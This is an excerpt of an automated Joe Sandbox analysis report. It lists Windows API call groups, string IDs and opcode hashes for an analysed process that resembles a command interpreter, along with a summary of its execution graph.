                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176B17
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                              • String ID:
                                              • API String ID: 3512109576-0
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B6D0
                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B6E7
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B701
                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B715
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocSize
                                              • String ID:
                                              • API String ID: 2549470565-0
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D01C
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D033
                                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D06D
                                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D07F
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                              • String ID:
                                              • API String ID: 1033415088-0
                                              APIs
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                              • String ID:
                                              • API String ID: 22757656-0
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1956C5
                                              • RtlFreeHeap.NTDLL(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1956D9
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1956FD
                                              • RtlFreeHeap.NTDLL(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB195711
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              APIs
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                              • String ID:
                                              • API String ID: 140117192-0
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AD6
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AEF
                                                • Part of subcall function 00007FF6EB184A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                                • Part of subcall function 00007FF6EB184A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                                • Part of subcall function 00007FF6EB184A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                                • Part of subcall function 00007FF6EB184A14: memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                                • Part of subcall function 00007FF6EB184A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB18EE64
                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6EB178798), ref: 00007FF6EB18EE78
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                              • String ID:
                                              • API String ID: 2759988882-0
                                              • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                              • Instruction ID: 18f3f24639bc34803f82bdc0cdb2d125698f7625b231f57c03697eec6da53e59
                                              • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                              • Instruction Fuzzy Hash: 44F06822A09B42C6EF0457A5A4043B8A9E1FF4EB55B488034CD0FC2370EF3DB4048716
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID:
                                              • API String ID: 1606018815-0
                                              • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                              • Instruction ID: 3e980c86596421d7fd7bdfeb759c1ca8b2a5277fc4365a964f0bbf3054fd365d
                                              • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                              • Instruction Fuzzy Hash: 21F01232524A81DBD7045B10F8443B9FA60FB8EB26F449234DA4B423A4DF3DE4088B05
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • wcschr.MSVCRT ref: 00007FF6EB1A11DC
                                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6EB19827A), ref: 00007FF6EB1A1277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcessmemmovewcschr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 4220614737-381716982
                                              • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction ID: 430a79cb411898bf52e844803a0c0f31ff7d27962a3ef321d836fd0a0559ea1f
                                              • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction Fuzzy Hash: F771B37390824286D7608F25A4907F966A4FB9D7BCF500636C94DC3BB4CE3EF4558B09
                                              APIs
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • longjmp.MSVCRT ref: 00007FF6EB18CCBC
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18CCE0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                              • String ID: GeToken: (%x) '%s'
                                              • API String ID: 3282654869-1994581435
                                              • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                              • Instruction ID: 1c668090192a9d6a853a71fffdf147214515174d2e7b40bbb6e3182b789114da
                                              • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                              • Instruction Fuzzy Hash: 8161D167A0D25682FA148B21E4943F922D4AF4E7BCF144535C91EC77F9EE7EE440870A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memmovewcsncmp
                                              • String ID: 0123456789
                                              • API String ID: 3879766669-2793719750
                                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction ID: 2f2115648c17e464e55a68419d3083fd1ae8bcb41bdf2b7c5294e5c131bfd03c
                                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction Fuzzy Hash: BA41D223F1878A85EA258F2694043FA6394FB4CBA8F445135CE4E837A4DE3DE4498B85
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1997D0
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1998D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction ID: 066514ba7933842922cd880d7662a6ff2c702969be1fc716b82f63d2f26873b9
                                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction Fuzzy Hash: 3241E333A0979681EA00DB16D4442B963A4FB8DBE8F508134DA5D837F5EF3AE846C349
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A0FC
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A1FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction ID: 77ab1895bddaabd542434f17aca530fee6fd7b1ad717c390fdc28c1049055b1e
                                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction Fuzzy Hash: 4B41C323A19796C1EA00DB15D4446B963A4FB8DBE8F508131DA5D837F4DF3AE84AC389
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleTitle
                                              • String ID: -
                                              • API String ID: 3358957663-3695764949
                                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                              • Instruction ID: 0860ab46cd33e9d60c8b1afca95f15154b2537f9e8432c5a7d53614791c6d8be
                                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                              • Instruction Fuzzy Hash: BB318323A0864282EA049B11E4503F86BA5BB4EBF8F544135DD0E977F5DF7EE441C74A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmpswscanf
                                              • String ID: :EOF
                                              • API String ID: 1534968528-551370653
                                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                              • Instruction ID: 0277a87fec0a15bc642378dcef576300ba00173b452db3f657ca23fb02cb8757
                                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                              • Instruction Fuzzy Hash: 02318E33A18A42C6EB149B15E9813F872A1FF5CB68F444031EF4D862B5DF2EE941874A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp
                                              • String ID: /-Y
                                              • API String ID: 1886669725-4274875248
                                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction ID: 546cf248ef1937a6560cdfaa568024d4d6d61491d19ee941c16710dd2c2752d0
                                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction Fuzzy Hash: 2A21A667E0876581EA105B02A6443B876A0BB4DFE4F444032DE89877E4DF7EE4A2D70A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3$3
                                              • API String ID: 0-2538865259
                                              • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                              • Instruction ID: 59dd237efecc0b1cc373c63988b1351fcdec73dc9d8c2f8792b63a893b836354
                                              • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                              • Instruction Fuzzy Hash: 8C01426390A092CAF2458B20E8E43F42260BB4D338F940536C50AC22F9DF6E2485860A
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                              • Instruction ID: ef821c3ae07765de83a38d6bdb5185dcb333790d11e9d4c0222efe3f63a445f1
                                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                              • Instruction Fuzzy Hash: 22417C33A0974286EA148B10E4543B9B7A1FF89BA8B548038DA4D83764DF3EE444CB49

                                              Execution Graph

                                              Execution Coverage:5.6%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:663
                                              Total number of Limit Nodes:27
execution_graph (interactive graph; the raw node/edge token list behind it is not reproduced). Entries have the form "node-id address [API ...]" for nodes and "src->dst" for edges; "N API calls" after a node marks a collapsed subgraph. The nodes recoverable from the dump are:
• CRT start-up and fail-fast: 7ff6eb188d80 (Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage); 7ff6eb188f80 (RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess)
• Console and locale initialisation: 7ff6eb1837d8 (GetCurrentThreadId, OpenThread); 7ff6eb1804f4 (GetModuleHandleW, GetProcAddress, SetThreadLocale); 7ff6eb183839 (HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetThreadLocale); 7ff6eb185920 (VirtualQuery); GetConsoleOutputCP/GetCPInfo, _setjmp/longjmp, _setmode, EnterCriticalSection/LeaveCriticalSection
• Handle redirection: 7ff6eb176be0 (_pipe, _dup, _dup2, _close, _get_osfhandle, DuplicateHandle)
• Command-line handling, subtree of 7ff6eb17be00 (647 API calls): memset, GetConsoleTitleW, SetConsoleTitleW, _wcsicmp, wcsncmp, wcschr, towupper, GetLastError; 7ff6eb17b0d8 (_get_osfhandle, SetFilePointer, GetFileType, wcsrchr, _wcsnicmp, SearchPathW, _vsnwprintf); 7ff6eb181fac (wcsspn, wcschr, towupper); 7ff6eb17ce10 (_tell, _close, _wcsicmp, longjmp)
• Child-process creation, subtree of 7ff6eb185ad8: 7ff6eb184224 (InitializeProcThreadAttributeList, UpdateProcThreadAttribute, GetStartupInfoW, wcsrchr, lstrcmpW); 7ff6eb185a68 (SetConsoleMode); 7ff6eb18441a branching to 7ff6eb18442a (CreateProcessW) and 7ff6eb184596 (CreateProcessAsUserW); CloseHandle, GetLastError, DeleteProcThreadAttributeList, GetProcessHeap/RtlFreeHeap, _local_unwind
• Memory release: 7ff6eb17df60 (GetProcessHeap, RtlFreeHeap, VirtualFree, _setjmp, longjmp)
The dump is truncated (27 limit nodes): for example no edge into 7ff6eb18441a appears, so a missing edge here is not evidence that a call is unreachable.
